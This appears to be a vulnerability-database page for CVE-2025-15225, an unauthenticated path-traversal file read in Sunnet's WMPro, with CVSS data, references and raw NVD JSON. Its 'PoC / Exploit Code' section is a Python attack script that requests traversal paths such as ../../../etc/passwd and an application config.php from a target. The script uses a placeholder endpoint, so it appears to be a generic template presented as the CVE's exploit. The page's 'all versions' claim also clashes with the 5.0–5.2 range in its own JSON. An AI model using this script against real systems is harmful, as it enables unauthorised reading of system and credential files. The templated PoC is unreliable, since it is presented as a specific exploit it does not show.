CVE-2025-15225

Description

WMPro developed by Sunnet has an Arbitrary File Read vulnerability, allowing unauthenticated remote attackers to exploit Relative Path Traversal to read arbitrary system files.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:sun.net:wmpro:*:*:*:*:*:*:*:* - VULNERABLE

WMPro all versions (prior to patch)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-15225 PoC - WMPro Arbitrary File Read
# Target: WMPro by Sunnet
# Vulnerability: Relative Path Traversal leading to Arbitrary File Read

def exploit_wmpro(target_url, file_path):
    """
    Exploit arbitrary file read vulnerability in WMPro
    Args:
        target_url: Base URL of the vulnerable WMPro instance
        file_path: Path to the file to read (e.g., ../../../etc/passwd)
    """
    # Construct the malicious URL with path traversal
    # Adjust the endpoint based on actual vulnerable path
    endpoint = "/[vulnerable_endpoint]"
    params = {
        "file": file_path
    }
    
    try:
        response = requests.get(
            target_url + endpoint,
            params=params,
            timeout=10
        )
        
        if response.status_code == 200:
            print(f"[+] Successfully read: {file_path}")
            print(response.text)
        else:
            print(f"[-] Failed to read file. Status: {response.status_code}")
    except requests.RequestException as e:
        print(f"[-] Error: {e}")

# Example usage
if __name__ == "__main__":
    target = "http://target.com"
    # Read system passwd file
    exploit_wmpro(target, "../../../etc/passwd")
    # Read configuration files
    exploit_wmpro(target, "../../../etc/hosts")
    # Read application config
    exploit_wmpro(target, "../../../var/www/html/config.php")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15225
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15225
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15225/
[4] VulDB https://vuldb.com/cve/CVE-2025-15225
[5] https://www.twcert.org.tw/en/cp-139-10603-67149-2.html
[6] https://www.twcert.org.tw/tw/cp-132-10602-c1c69-1.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15225", "sourceIdentifier": "[email protected]", "published": "2025-12-29T07:15:56.333", "lastModified": "2025-12-31T20:55:14.363", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WMPro developed by Sunnet has an Arbitrary File Read vulnerability, allowing unauthenticated remote attackers to exploit Relative Path Traversal to read arbitrary system files."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-23"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sun.net:wmpro:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0", "versionEndIncluding": "5.2", "matchCriteriaId": "CA602599-6AA9-4B68-98B6-5F95E47DAD0E"}]}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10603-67149-2.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.twcert.org.tw/tw/cp-132-10602-c1c69-1.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}